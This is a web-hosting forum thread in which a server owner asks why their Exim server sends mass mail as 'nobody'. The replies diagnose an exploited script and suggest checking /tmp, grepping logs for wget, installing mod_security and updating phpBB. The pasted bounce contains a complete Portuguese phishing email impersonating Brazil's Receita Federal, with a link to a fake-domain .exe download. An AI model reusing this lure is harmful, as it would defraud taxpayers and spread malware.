Server sending mass mail to .com.br

[govand]

Hi,

This is the second time i face the same problem, the server start sending mass mail to un know address and all return back to the server, mails sent by nobody.

any body know what is the reasone?

here is sample of the mail:

1F6iA4-0006NK-8A-H
mailnull 47 12
<>
1139377600 0
-ident mailnull
-received_protocol local
-body_linecount 71
-allow_unqualified_recipient
-allow_unqualified_sender
-frozen 1139377601
-localerror
XX
1
nobody@mt2.midyatech.com

152P Received: from mailnull by mt2.midyatech.com with local (Exim 4.52)
id 1F6iA4-0006NK-8A
for nobody@mt2.midyatech.com; Wed, 08 Feb 2006 08:46:17 +0300
046 X-Failed-Recipients: overm1nd_go@yahoo.com.br
031 Auto-Submitted: auto-generated
061F From: Mail Delivery System <Mailer-Daemon@mt2.midyatech.com>
029T To: nobody@mt2.midyatech.com
059 Subject: Mail delivery failed: returning message to sender
050I Message-Id: <E1F6iA4-0006NK-8A@mt2.midyatech.com>
038 Date: Wed, 08 Feb 2006 08:46:17 +0300

1F6iA4-0006NK-8A-D
This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

overm1nd_go@yahoo.com.br
unrouteable mail domain "yahoo.com.br"

------ This is a copy of the message, including all the headers. ------

Return-path: <nobody@mt2.midyatech.com>
Received: from nobody by mt2.midyatech.com with local (Exim 4.52)
id 1F6iA4-0006NF-4n
for overm1nd_go@yahoo.com.br; Wed, 08 Feb 2006 08:46:17 +0300
To: overm1nd_go@yahoo.com.br
Subject: Reaviso: Verifique o seu CPF
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: aviso@receita-federal.org <aviso@receita-federal.org>
Message-Id: <E1F6iA4-0006NF-4n@mt2.midyatech.com>
Date: Wed, 08 Feb 2006 08:46:17 +0300


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML><BASE HREF="http://receita.gov.br/">
<head>
<title>Receita Federal</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<table width="550" height="690" border="1" cellpadding="0" cellspacing="0">
<!--DWLayoutTable-->
<tr>
<td width="546" height="688" valign="top" bordercolor="#FFFFFF"> <div align="left"><img src="http://www.receita.fazenda.gov.br/images/Menu/logo_srf.gif" width="152" height="51" hspace="0" vspace="0" border="0"><img src="http://www.receita.fazenda.gov.br/images/Menu/predios_srf.gif" width="238" height="51" hspace="0" vspace="0" border="0"><img src="http://www.srorgcontabil.com.br/images/banner_receitafederal.gif" width="148" height="51" border="0"> <img src="http://www.fazenda.gov.br/imagens/novobanner.gif" width="430" height="35" border="0"><img src="http://www.fazenda.gov.br/imagens/novobanner2.gif" width="116" height="35" border="0">
</div>

<blockquote>
<div align="left">
<p align="left"><font color="#FF0000" face="Verdana, Arial, Helvetica, sans-serif"><strong>AVISO URGENTE </strong></font></p>
<p align="left"><font color="#003366" face="Verdana" style="font-size:11px"><b><font color="#004284">Caro
contribuinte,</font></b></font></p>
<p align="left"><font color="#004284"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Estamos lhe enviando esta notificação para que você efetue a Declaração e Regularização de seu CPF.</font></font></p>
<p align="left"><font color="#004284"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Para efetuar esta declaração você deverá acessar o seguinte site apenas clicando no link abaixo: </font></font></p>

<p align="left"><font face="Verdana" color="#0071E1" style="font-size:11px"><a href="http://www.receita-federal.org/recadastramento.exe">http://www.receita-federal.org/recadastramento.exe</a></font></p>
</div>
<p align="justify"><font color="#004284" face="Verdana" style="font-size:11px">Quem
não efetuar esta declaração poderá ter seu CPF suspenso, podendo indisponabilizar de alguns serviços como registros nominais ou compras. </font></p>
<p align="justify"><font color="#004284" face="Verdana" style="font-size:11px">Por
questões de segurança, informações e dados
do contribuinte não são solicitados por e-mail em hipótese
alguma.</font></p>

<p align="justify"> </p>
<p align="justify"><b><font face="Verdana" color="#004284" style="font-size:11px">Atenciosamente,</font></p>
<p><font face="Verdana" color="#004284" style="font-size:11px">Coordenação
de Integração Fisco-Contribuinte<br>
Secretaria da Receita Federal</font><br>
</p>
<p align="center"><img src="http://www.receita.fazenda.gov.br/images/Centro/selo_36anos_srf.gif" width="126" height="123" border="0" align="right"></p>

<p align="center"> </p>
<p align="center"><img src="http://www.distritofederal.df.gov.br/sites/100/129/imagens/receitafederal.jpg" width="116" height="52" border="0" align="left"></p>

</div>

</blockquote></td>
</tr>
</table>
</html>

[Jimmyftw]

It would be because somewhere on your server a script uploaded has been exploited or perhaps the server itself and a hacker has uploaded some spamming scripts and run them. Typical things to check are suspicious files owned by nobody in /tmp and /dev/shm . You can grep /usr/local/apache/domlogs/* for wget, /tmp etc... to try and find which script was exploited to upload it if you find an uploaded one. You can also search these forums for many other suggestions on how to track this.

[AndyReed]

We have seen this issue with many clients and the only way out is to find these bad/insecure scripts and either suspend or delete them. We wrote a script that tracks down these malicious scripts and helped us solve these problems for good.

[maverick23]

even i faced this problem with my server but after installing mod_secutiry it solved my issues.... try that may be that helps...

[WhiteBear]

What it happens if I to modify chmod of wget?

now - -rwx------ 1 root root 175000 Aug 4 2003 wget*

later - ---------- 1 root root 175000 Aug 4 2003 wget

Tks a lot,

[chirpy]

That's a very bad idea. The minimum permissions that you should have on wget are 700 otherwise you're going to break things. With 700, users are not going to be able to run wget anyway.

I'd echo the advise Jimmyftw gave.

[marcusg70]

Definetely a hacker script.
Check the link in that e-mail ... "http://www.receita-federal.org/....". It is pointing to an exe-file on a domain that looks like the brazilian IRS but actually isn't.....

[embsupafly]

check your /tmp directory for scripts and do a 'ps -auxfww' to see what is actually running. This has happened to us before. Check for old versions of phpbb that could be exploited, you can use this script that will automatically detect out of date versions of phpbb: http://www.cplicensing.net/files/scripts/chkphpbbver